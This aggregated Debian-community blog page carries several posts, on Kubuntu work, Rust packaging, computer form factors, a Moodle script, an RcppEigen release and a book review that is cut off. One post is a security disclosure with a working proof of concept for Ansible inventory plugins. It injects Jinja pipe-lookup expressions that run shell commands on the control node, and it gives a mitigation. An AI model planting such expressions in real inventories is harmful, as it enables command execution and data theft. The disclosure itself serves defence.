Work report Kubuntu: Bug bashing! I am triaging allthebugs for Plasma which can be seen here: https://bugs.launchpad.net/plasma-5.27/+bug/2053125 I am happy to report many of the remaining bugs have been fixed in the latest bug fix release 5.27.11. I prepared https://kde.org/announcements/plasma/5/5.27.11/ and Rik uploaded to archive, thank you. Unfortunately, this and several other key fixes are stuck in transition do to the time_t64 transition, which you can read about here: https://wiki.debian.org/ReleaseGoals/64bit-time . It is the biggest transition in Debian/Ubuntu history and it couldn t come at a worst time. We are aware our ISO installer is currently broken, calamares is one of those things stuck in this transition. There is a workaround in the comments of the bug report: https://bugs.launchpad.net/ubuntu/+source/calamares/+bug/2054795 Fixed an issue with plasma-welcome. Found the fix for emojis and Aaron has kindly moved this forward with the fontconfig maintainer. Thanks! I have received an https://kfocus.org/spec/spec-ir14.html laptop and it is truly a great machine and is now my daily driver. A big thank you to the Kfocus team! I can t wait to show it off at https://linuxfestnorthwest.org/. KDE Snaps: You will see the activity in this ramp back up as the KDEneon Core project is finally a go! I will participate in the project with part time status and get everyone in the Enokia team up to speed with my snap knowledge, help prepare the qt6/kf6 transition, package plasma, and most importantly I will focus on documentation for future contributors. I have created the ( now split ) qt6 with KDE patchset support and KDE frameworks 6 SDK and runtime snaps. I have made the kde-neon-6 extension and the PR is in: https://github.com/canonical/snapcraft/pull/4698 . Future work on the extension will include multiple versions track support and core24 support.

I have successfully created our first qt6/kf6 snap ark. They will show showing up in the store once all the required bits have been merged and published. Thank you for stopping by. ~Scarlett

21 March 2024

Ian Jackson: How to use Rust on Debian (and Ubuntu, etc.)

tl;dr: Don t just apt install rustc cargo. Either do that and make sure to use only Rust libraries from your distro (with the tiresome config runes below); or, just use rustup. Don t do the obvious thing; it s never what you want Debian ships a Rust compiler, and a large number of Rust libraries. But if you just do things the obvious default way, with apt install rustc cargo, you will end up using Debian s compiler but upstream libraries, directly and uncurated from crates.io. This is not what you want. There are about two reasonable things to do, depending on your preferences. Q. Download and run whatever code from the internet? The key question is this: Are you comfortable downloading code, directly from hundreds of upstream Rust package maintainers, and running it ? That s what cargo does. It s one of the main things it s for. Debian s cargo behaves, in this respect, just like upstream s. Let me say that again: Debian s cargo promiscuously downloads code from crates.io just like upstream cargo. So if you use Debian s cargo in the most obvious way, you are still downloading and running all those random libraries. The only thing you re avoiding downloading is the Rust compiler itself, which is precisely the part that is most carefully maintained, and of least concern. Debian s cargo can even download from crates.io when you re building official Debian source packages written in Rust: if you run dpkg-buildpackage, the downloading is suppressed; but a plain cargo build will try to obtain and use dependencies from the upstream ecosystem. ( Happily , if you do this, it s quite likely to bail out early due to version mismatches, before actually downloading anything.) Option 1: WTF, no I don t want curl bash OK, but then you must limit yourself to libraries available within Debian. Each Debian release provides a curated set. It may or may not be sufficient for your needs. Many capable programs can be written using the packages in Debian. But any upstream Rust project that you encounter is likely to be a pain to get working, unless their maintainers specifically intend to support this. (This is fairly rare, and the Rust tooling doesn t make it easy.) To go with this plan, apt install rustc cargo and put this in your configuration, in $HOME/.cargo/config.toml:
[source.debian-packages]
directory = "/usr/share/cargo/registry"
[source.crates-io]
replace-with = "debian-packages"
This causes cargo to look in /usr/share for dependencies, rather than downloading them from crates.io. You must then install the librust-FOO-dev packages for each of your dependencies, with apt. This will allow you to write your own program in Rust, and build it using cargo build. Option 2: Biting the curl bash bullet If you want to build software that isn t specifically targeted at Debian s Rust you will probably need to use packages from crates.io, not from Debian. If you re doing to do that, there is little point not using rustup to get the latest compiler. rustup s install rune is alarming, but cargo will be doing exactly the same kind of thing, only worse (because it trusts many more people) and more hidden. So in this case: do run the curl bash install rune. Hopefully the Rust project you are trying to build have shipped a Cargo.lock; that contains hashes of all the dependencies that they last used and tested. If you run cargo build --locked, cargo will only use those versions, which are hopefully OK. And you can run cargo audit to see if there are any reported vulnerabilities or problems. But you ll have to bootstrap this with cargo install --locked cargo-audit; cargo-audit is from the RUSTSEC folks who do care about these kind of things, so hopefully running their code (and their dependencies) is fine. Note the --locked which is needed because cargo s default behaviour is wrong. Privilege separation This approach is rather alarming. For my personal use, I wrote a privsep tool which allows me to run all this upstream Rust code as a separate user. That tool is nailing-cargo. It s not particularly well productised, or tested, but it does work for at least one person besides me. You may wish to try it out, or consider alternative arrangements. Bug reports and patches welcome. OMG what a mess Indeed. There are large number of technical and social factors at play. cargo itself is deeply troubling, both in principle, and in detail. I often find myself severely disappointed with its maintainers decisions. In mitigation, much of the wider Rust upstream community does takes this kind of thing very seriously, and often makes good choices. RUSTSEC is one of the results. Debian s technical arrangements for Rust packaging are quite dysfunctional, too: IMO the scheme is based on fundamentally wrong design principles. But, the Debian Rust packaging team is dynamic, constantly working the update treadmills; and the team is generally welcoming and helpful. Sadly last time I explored the possibility, the Debian Rust Team didn t have the appetite for more fundamental changes to the workflow (including, for example, changes to dependency version handling). Significant improvements to upstream cargo s approach seem unlikely, too; we can only hope that eventually someone might manage to supplant it.
edited 2024-03-21 21:49 to add a cut tag


comment count unavailable comments

13 March 2024

Russell Coker: The Shape of Computers

Introduction There have been many experiments with the sizes of computers, some of which have stayed around and some have gone away. The trend has been to make computers smaller, the early computers had buildings for them. Recently for come classes computers have started becoming as small as could be reasonably desired. For example phones are thin enough that they can blow away in a strong breeze, smart watches are much the same size as the old fashioned watches they replace, and NUC type computers are as small as they need to be given the size of monitors etc that they connect to. This means that further development in the size and shape of computers will largely be determined by human factors. I think we need to consider how computers might be developed to better suit humans and how to write free software to make such computers usable without being constrained by corporate interests. Those of us who are involved in developing OSs and applications need to consider how to adjust to the changes and ideally anticipate changes. While we can t anticipate the details of future devices we can easily predict general trends such as being smaller, higher resolution, etc. Desktop/Laptop PCs When home computers first came out it was standard to have the keyboard in the main box, the Apple ][ being the most well known example. This has lost popularity due to the demand to have multiple options for a light keyboard that can be moved for convenience combined with multiple options for the box part. But it still pops up occasionally such as the Raspberry Pi 400 [1] which succeeds due to having the computer part being small and light. I think this type of computer will remain a niche product. It could be used in a add a screen to make a laptop as opposed to the add a keyboard to a tablet to make a laptop model but a tablet without a keyboard is more useful than a non-server PC without a display. The PC as box with connections for keyboard, display, etc has a long future ahead of it. But the sizes will probably decrease (they should have stopped making PC cases to fit CD/DVD drives at least 10 years ago). The NUC size is a useful option and I think that DVD drives will stop being used for software soon which will allow a range of smaller form factors. The regular laptop is something that will remain useful, but the tablet with detachable keyboard devices could take a lot of that market. Full functionality for all tasks requires a keyboard because at the moment text editing with a touch screen is an unsolved problem in computer science [2]. The Lenovo Thinkpad X1 Fold [3] and related Lenovo products are very interesting. Advances in materials allow laptops to be thinner and lighter which leaves the screen size as a major limitation to portability. There is a conflict between desiring a large screen to see lots of content and wanting a small size to carry and making a device foldable is an obvious solution that has recently become possible. Making a foldable laptop drives a desire for not having a permanently attached keyboard which then makes a touch screen keyboard a requirement. So this means that user interfaces for PCs have to be adapted to work well on touch screens. The Think line seems to be continuing the history of innovation that it had when owned by IBM. There are also a range of other laptops that have two regular screens so they are essentially the same as the Thinkpad X1 Fold but with two separate screens instead of one folding one, prices are as low as $600US. I think that the typical interfaces for desktop PCs (EG MS-Windows and KDE) don t work well for small devices and touch devices and the Android interface generally isn t a good match for desktop systems. We need to invent more options for this. This is not a criticism of KDE, I use it every day and it works well. But it s designed for use cases that don t match new hardware that is on sale. As an aside it would be nice if Lenovo gave samples of their newest gear to people who make significant contributions to GUIs. Give a few Thinkpad Fold devices to KDE people, a few to GNOME people, and a few others to people involved in Wayland development and see how that promotes software development and future sales. We also need to adopt features from laptops and phones into desktop PCs. When voice recognition software was first released in the 90s it was for desktop PCs, it didn t take off largely because it wasn t very accurate (none of them recognised my voice). Now voice recognition in phones is very accurate and it s very common for desktop PCs to have a webcam or headset with a microphone so it s time for this to be re-visited. GPS support in laptops is obviously useful and can work via Wifi location, via a USB GPS device, or via wwan mobile phone hardware (even if not used for wwan networking). Another possibility is using the same software interfaces as used for GPS on laptops for a static definition of location for a desktop PC or server. The Interesting New Things Watch Like The wrist-watch [4] has been a standard format for easy access to data when on the go since it s military use at the end of the 19th century when the practical benefits beat the supposed femininity of the watch. So it seems most likely that they will continue to be in widespread use in computerised form for the forseeable future. For comparison smart phones have been in widespread use as pocket watches for about 10 years. The question is how will watch computers end up? Will we have Dick Tracy style watch phones that you speak into? Will it be the current smart watch functionality of using the watch to answer a call which goes to a bluetooth headset? Will smart watches end up taking over the functionality of the calculator watch [5] which was popular in the 80 s? With today s technology you could easily have a fully capable PC strapped to your forearm, would that be useful? Phone Like Folding phones (originally popularised as Star Trek Tricorders) seem likely to have a long future ahead of them. Engineering technology has only recently developed to the stage of allowing them to work the way people would hope them to work (a folding screen with no gaps). Phones and tablets with multiple folds are coming out now [6]. This will allow phones to take much of the market share that tablets used to have while tablets and laptops merge at the high end. I ve previously written about Convergence between phones and desktop computers [7], the increased capabilities of phones adds to the case for Convergence. Folding phones also provide new possibilities for the OS. The Oppo OnePlus Open and the Google Pixel Fold both have a UI based around using the two halves of the folding screen for separate data at some times. I think that the current user interfaces for desktop PCs don t properly take advantage of multiple monitors and the possibilities raised by folding phones only adds to the lack. My pet peeve with multiple monitor setups is when they don t make it obvious which monitor has keyboard focus so you send a CTRL-W or ALT-F4 to the wrong screen by mistake, it s a problem that also happens on a single screen but is worse with multiple screens. There are rumours of phones described as three fold (where three means the number of segments with two folds between them), it will be interesting to see how that goes. Will phones go the same way as PCs in terms of having a separation between the compute bit and the input device? It s quite possible to have a compute device in the phone form factor inside a secure pocket which talks via Bluetooth to another device with a display and speakers. Then you could change your phone between a phone-size display and a tablet sized display easily and when using your phone a thief would not be able to easily steal the compute bit (which has passwords etc). Could the watch part of the phone (strapped to your wrist and difficult to steal) be the active part and have a tablet size device as an external display? There are already announcements of smart watches with up to 1GB of RAM (same as the Samsung Galaxy S3), that s enough for a lot of phone functionality. The Rabbit R1 [8] and the Humane AI Pin [9] have some interesting possibilities for AI speech interfaces. Could that take over some of the current phone use? It seems that visually impaired people have been doing badly in the trend towards touch screen phones so an option of a voice interface phone would be a good option for them. As an aside I hope some people are working on AI stuff for FOSS devices. Laptop Like One interesting PC variant I just discovered is the Higole 2 Pro portable battery operated Windows PC with 5.5 touch screen [10]. It looks too thick to fit in the same pockets as current phones but is still very portable. The version with built in battery is $AU423 which is in the usual price range for low end laptops and tablets. I don t think this is the future of computing, but it is something that is usable today while we wait for foldable devices to take over. The recent release of the Apple Vision Pro [11] has driven interest in 3D and head mounted computers. I think this could be a useful peripheral for a laptop or phone but it won t be part of a primary computing environment. In 2011 I wrote about the possibility of using augmented reality technology for providing a desktop computing environment [12]. I wonder how a Vision Pro would work for that on a train or passenger jet. Another interesting thing that s on offer is a laptop with 7 touch screen beside the keyboard [13]. It seems that someone just looked at what parts are available cheaply in China (due to being parts of more popular devices) and what could fit together. I think a keyboard should be central to the monitor for serious typing, but there may be useful corner cases where typing isn t that common and a touch-screen display is of use. Developing a range of strange hardware and then seeing which ones get adopted is a good thing and an advantage of Ali Express and Temu. Useful Hardware for Developing These Things I recently bought a second hand Thinkpad X1 Yoga Gen3 for $359 which has stylus support [14], and it s generally a great little laptop in every other way. There s a common failure case of that model where touch support for fingers breaks but the stylus still works which allows it to be used for testing touch screen functionality while making it cheap. The PineTime is a nice smart watch from Pine64 which is designed to be open [15]. I am quite happy with it but haven t done much with it yet (apart from wearing it every day and getting alerts etc from Android). At $50 when delivered to Australia it s significantly more expensive than most smart watches with similar features but still a lot cheaper than the high end ones. Also the Raspberry Pi Watch [16] is interesting too. The PinePhonePro is an OK phone made to open standards but it s hardware isn t as good as Android phones released in the same year [17]. I ve got some useful stuff done on mine, but the battery life is a major issue and the screen resolution is low. The Librem 5 phone from Purism has a better hardware design for security with switches to disable functionality [18], but it s even slower than the PinePhonePro. These are good devices for test and development but not ones that many people would be excited to use every day. Wwan hardware (for accessing the phone network) in M.2 form factor can be obtained for free if you have access to old/broken laptops. Such devices start at about $35 if you want to buy one. USB GPS devices also start at about $35 so probably not worth getting if you can get a wwan device that does GPS as well. What We Must Do Debian appears to have some voice input software in the pocketsphinx package but no documentation on how it s to be used. This would be a good thing to document, I spent 15 mins looking at it and couldn t get it going. To take advantage of the hardware features in phones we need software support and we ideally don t want free software to lag too far behind proprietary software which IMHO means the typical Android setup for phones/tablets. Support for changing screen resolution is already there as is support for touch screens. Support for adapting the GUI to changed screen size is something that needs to be done even today s hardware of connecting a small laptop to an external monitor doesn t have the ideal functionality for changing the UI. There also seem to be some limitations in touch screen support with multiple screens, I haven t investigated this properly yet, it definitely doesn t work in an expected manner in Ubuntu 22.04 and I haven t yet tested the combinations on Debian/Unstable. ML is becoming a big thing and it has some interesting use cases for small devices where a smart device can compensate for limited input options. There s a lot of work that needs to be done in this area and we are limited by the fact that we can t just rip off the work of other people for use as training data in the way that corporations do. Security is more important for devices that are at high risk of theft. The vast majority of free software installations are way behind Android in terms of security and we need to address that. I have some ideas for improvement but there is always a conflict between security and usability and while Android is usable for it s own special apps it s not usable in a I want to run applications that use any files from any other applicationsin any way I want sense. My post about Sandboxing Phone apps is relevant for people who are interested in this [19]. We also need to extend security models to cope with things like ok google type functionality which has the potential to be a bug and the emerging class of LLM based attacks. I will write more posts about these thing. Please write comments mentioning FOSS hardware and software projects that address these issues and also documentation for such things.

11 March 2024

Evgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now. TL;DR Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it. Inventory plugins Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman. For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object. And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell. Let that sink in for a moment, and then we'll look at an example. Example inventory plugin
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '  lookup("pipe", "touch /tmp/hacked" )  ')
The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:
  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory
In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar. The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host. Using the example inventory plugin Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from). And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need. If we now call ansible-inventory, we'll see our host and our variable present:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
 
    "_meta":  
        "hostvars":  
            "exploit.example.com":  
                "ansible_connection": "local",
                "something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "
             
         
     ,
    "all":  
        "children": [
            "ungrouped"
        ]
     ,
    "ungrouped":  
        "hosts": [
            "exploit.example.com"
        ]
     
 
(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.) So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string. Executing a playbook, interpreting Jinja To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM. Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!
- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]
This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]
TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] =>  
    "hostvars[inventory_hostname]":  
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],
         
        "something_funny": ""
     
 
PLAY RECAP *************************************************************************************************
exploit.example.com  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was lookup("pipe", "touch /tmp/hacked" ) and touch does not return anything. But it did create the file!
% ls -alh /tmp/hacked 
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked
We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/ . Why is this possible? This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it. In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:
from ansible.utils.unsafe_proxy import wrap_var
 
self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('  lookup("pipe", "touch /tmp/hacked" )  '))
Which then gets rendered as a string when dumping the variables using debug:
"something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "
But it seems inventories don't do this:
for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)
(aws_ec2.py)
for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)
(hcloud.py)
for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))
(foreman.py) And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe". Can something similar happen in other parts of Ansible? It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481 But even if we only look at inventories, add_host(host) can be abused in a similar way:
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol  lookup("pipe", "touch /tmp/hacked-host" )  ')
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
fatal: [lol  lookup("pipe", "touch /tmp/hacked-host" )  ]: UNREACHABLE! =>  "changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true 
PLAY RECAP ************************************************************************************************
lol  lookup("pipe", "touch /tmp/hacked-host" )   : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0
% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host
Affected versions I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.

8 March 2024

Louis-Philippe V ronneau: Acts of active procrastination: example of a silly Python script for Moodle

My brain is currently suffering from an overload caused by grading student assignments. In search of a somewhat productive way to procrastinate, I thought I would share a small script I wrote sometime in 2023 to facilitate my grading work. I use Moodle for all the classes I teach and students use it to hand me out their papers. When I'm ready to grade them, I download the ZIP archive Moodle provides containing all their PDF files and comment them using xournalpp and my Wacom tablet. Once this is done, I have a directory structure that looks like this:
Assignment FooBar/
  Student A_21100_assignsubmission_file
    graded paper.pdf
    Student A's perfectly named assignment.pdf
    Student A's perfectly named assignment.xopp
  Student B_21094_assignsubmission_file
    graded paper.pdf
    Student B's perfectly named assignment.pdf
    Student B's perfectly named assignment.xopp
  Student C_21093_assignsubmission_file
    graded paper.pdf
    Student C's perfectly named assignment.pdf
    Student C's perfectly named assignment.xopp
 
Before I can upload files back to Moodle, this directory needs to be copied (I have to keep the original files), cleaned of everything but the graded paper.pdf files and compressed in a ZIP. You can see how this can quickly get tedious to do by hand. Not being a complete tool, I often resorted to crafting a few spurious shell one-liners each time I had to do this1. Eventually I got tired of ctrl-R-ing my shell history and wrote something reusable. Behold this script! When I began writing this post, I was certain I had cheaped out on my 2021 New Year's resolution and written it in Shell, but glory!, it seems I used a proper scripting language instead.
#!/usr/bin/python3
# Copyright (C) 2023, Louis-Philippe V ronneau <pollo@debian.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
"""
This script aims to take a directory containing PDF files exported via the
Moodle mass download function, remove everything but the final files to submit
back to the students and zip it back.
usage: ./moodle-zip.py <target_dir>
"""
import os
import shutil
import sys
import tempfile
from fnmatch import fnmatch
def sanity(directory):
    """Run sanity checks before doing anything else"""
    base_directory = os.path.basename(os.path.normpath(directory))
    if not os.path.isdir(directory):
        sys.exit(f"Target directory  directory  is not a valid directory")
    if os.path.exists(f"/tmp/ base_directory .zip"):
        sys.exit(f"Final ZIP file path '/tmp/ base_directory .zip' already exists")
    for root, dirnames, _ in os.walk(directory):
        for dirname in dirnames:
            corrige_present = False
            for file in os.listdir(os.path.join(root, dirname)):
                if fnmatch(file, 'graded paper.pdf'):
                    corrige_present = True
            if corrige_present is False:
                sys.exit(f"Directory  dirname  does not contain a 'graded paper.pdf' file")
def clean(directory):
    """Remove superfluous files, to keep only the graded PDF"""
    with tempfile.TemporaryDirectory() as tmp_dir:
        shutil.copytree(directory, tmp_dir, dirs_exist_ok=True)
        for root, _, filenames in os.walk(tmp_dir):
            for file in filenames:
                if not fnmatch(file, 'graded paper.pdf'):
                    os.remove(os.path.join(root, file))
        compress(tmp_dir, directory)
def compress(directory, target_dir):
    """Compress directory into a ZIP file and save it to the target dir"""
    target_dir = os.path.basename(os.path.normpath(target_dir))
    shutil.make_archive(f"/tmp/ target_dir ", 'zip', directory)
    print(f"Final ZIP file has been saved to '/tmp/ target_dir .zip'")
def main():
    """Main function"""
    target_dir = sys.argv[1]
    sanity(target_dir)
    clean(target_dir)
if __name__ == "__main__":
    main()
If for some reason you happen to have a similar workflow as I and end up using this script, hit me up? Now, back to grading...

  1. If I recall correctly, the lazy way I used to do it involved copying the directory, renaming the extension of the graded paper.pdf files, deleting all .pdf and .xopp files using find and changing graded paper.foobar back to a PDF. Some clever regex or learning awk from the ground up could've probably done the job as well, but you know, that would have required using my brain and spending spoons...

28 February 2024

Dirk Eddelbuettel: RcppEigen 0.3.4.0.0 on CRAN: New Upstream, At Last

We are thrilled to share that RcppEigen has now upgraded to Eigen release 3.4.0! The new release 0.3.4.0.0 arrived on CRAN earlier today, and has been shipped to Debian as well. Eigen is a C++ template library for linear algebra: matrices, vectors, numerical solvers, and related algorithms. This update has been in the works for a full two and a half years! It all started with a PR #102 by Yixuan bringing the package-local changes for R integration forward to usptream release 3.4.0. We opened issue #103 to steer possible changes from reverse-dependency checking through. Lo and behold, this just stalled because a few substantial changes were needed and not coming. But after a long wait, and like a bolt out of a perfectly blue sky, Andrew revived it in January with a reverse depends run of his own along with a set of PRs. That was the push that was needed, and I steered it along with a number of reverse dependency checks, and occassional emails to maintainers. We managed to bring it down to only three packages having a hickup, and all three had received PRs thanks to Andrew and even merged them. So the plan became to release today following a final fourteen day window. And CRAN was convinced by our arguments that we followed due process. So there it is! Big big thanks to all who helped it along, especially Yixuan and Andrew but also Mikael who updated another patch set he had prepared for the previous release series. The complete NEWS file entry follows.

Changes in RcppEigen version 0.3.4.0.0 (2024-02-28)
  • The Eigen version has been upgrade to release 3.4.0 (Yixuan)
  • Extensive reverse-dependency checks ensure only three out of over 400 packages at CRAN are affected; PRs and patches helped other packages
  • The long-running branch also contains substantial contributions from Mikael Jagan (for the lme4 interface) and Andrew Johnson (revdep PRs)

Courtesy of CRANberries, there is also a diffstat report for the most recent release. If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

25 February 2024

Russ Allbery: Review: The Fund

Review: The Fund, by Rob Copeland
Publisher: St. Martin's Press
Copyright: 2023
ISBN: 1-250-27694-2
Format: Kindle
Pages: 310
I first became aware of Ray Dalio when either he or his publisher plastered advertisements for The Principles all over the San Francisco 4th and King Caltrain station. If I recall correctly, there were also constant radio commercials; it was a whole thing in 2017. My brain is very good at tuning out advertisements, so my only thought at the time was "some business guy wrote a self-help book." I think I vaguely assumed he was a CEO of some traditional business, since that's usually who writes heavily marketed books like this. I did not connect him with hedge funds or Bridgewater, which I have a bad habit of confusing with Blackwater. The Principles turns out to be more of a laundered cult manual than a self-help book. And therein lies a story. Rob Copeland is currently with The New York Times, but for many years he was the hedge fund reporter for The Wall Street Journal. He covered, among other things, Bridgewater Associates, the enormous hedge fund founded by Ray Dalio. The Fund is a biography of Ray Dalio and a history of Bridgewater from its founding as a vehicle for Dalio's advising business until 2022 when Dalio, after multiple false starts and title shuffles, finally retired from running the company. (Maybe. Based on the history recounted here, it wouldn't surprise me if he was back at the helm by the time you read this.) It is one of the wildest, creepiest, and most abusive business histories that I have ever read. It's probably worth mentioning, as Copeland does explicitly, that Ray Dalio and Bridgewater hate this book and claim it's a pack of lies. Copeland includes some of their denials (and many non-denials that sound as good as confirmations to me) in footnotes that I found increasingly amusing.
A lawyer for Dalio said he "treated all employees equally, giving people at all levels the same respect and extending them the same perks."
Uh-huh. Anyway, I personally know nothing about Bridgewater other than what I learned here and the occasional mention in Matt Levine's newsletter (which is where I got the recommendation for this book). I have no independent information whether anything Copeland describes here is true, but Copeland provides the typical extensive list of notes and sourcing one expects in a book like this, and Levine's comments indicated it's generally consistent with Bridgewater's industry reputation. I think this book is true, but since the clear implication is that the world's largest hedge fund was primarily a deranged cult whose employees mostly spied on and rated each other rather than doing any real investment work, I also have questions, not all of which Copeland answers to my satisfaction. But more on that later. The center of this book are the Principles. These were an ever-changing list of rules and maxims for how people should conduct themselves within Bridgewater. Per Copeland, although Dalio later published a book by that name, the version of the Principles that made it into the book was sanitized and significantly edited down from the version used inside the company. Dalio was constantly adding new ones and sometimes changing them, but the common theme was radical, confrontational "honesty": never being silent about problems, confronting people directly about anything that they did wrong, and telling people all of their faults so that they could "know themselves better." If this sounds like textbook abusive behavior, you have the right idea. This part Dalio admits to openly, describing Bridgewater as a firm that isn't for everyone but that achieves great results because of this culture. But the uncomfortably confrontational vibes are only the tip of the iceberg of dysfunction. Here are just a few of the ways this played out according to Copeland: In one of the common and all-too-disturbing connections between Wall Street finance and the United States' dysfunctional government, James Comey (yes, that James Comey) ran internal security for Bridgewater for three years, meaning that he was the one who pulled evidence from surveillance cameras for Dalio to use to confront employees during his trials. In case the cult vibes weren't strong enough already, Bridgewater developed its own idiosyncratic language worthy of Scientology. The trials were called "probings," firing someone was called "sorting" them, and rating them was called "dotting," among many other Bridgewater-specific terms. Needless to say, no one ever probed Dalio himself. You will also be completely unsurprised to learn that Copeland documents instances of sexual harassment and discrimination at Bridgewater, including some by Dalio himself, although that seems to be a relatively small part of the overall dysfunction. Dalio was happy to publicly humiliate anyone regardless of gender. If you're like me, at this point you're probably wondering how Bridgewater continued operating for so long in this environment. (Per Copeland, since Dalio's retirement in 2022, Bridgewater has drastically reduced the cult-like behaviors, deleted its archive of probings, and de-emphasized the Principles.) It was not actually a religious cult; it was a hedge fund that has to provide investment services to huge, sophisticated clients, and by all accounts it's a very successful one. Why did this bizarre nightmare of a workplace not interfere with Bridgewater's business? This, I think, is the weakest part of this book. Copeland makes a few gestures at answering this question, but none of them are very satisfying. First, it's clear from Copeland's account that almost none of the employees of Bridgewater had any control over Bridgewater's investments. Nearly everyone was working on other parts of the business (sales, investor relations) or on cult-related obsessions. Investment decisions (largely incorporated into algorithms) were made by a tiny core of people and often by Dalio himself. Bridgewater also appears to not trade frequently, unlike some other hedge funds, meaning that they probably stay clear of the more labor-intensive high-frequency parts of the business. Second, Bridgewater took off as a hedge fund just before the hedge fund boom in the 1990s. It transformed from Dalio's personal consulting business and investment newsletter to a hedge fund in 1990 (with an earlier investment from the World Bank in 1987), and the 1990s were a very good decade for hedge funds. Bridgewater, in part due to Dalio's connections and effective marketing via his newsletter, became one of the largest hedge funds in the world, which gave it a sort of institutional momentum. No one was questioned for putting money into Bridgewater even in years when it did poorly compared to its rivals. Third, 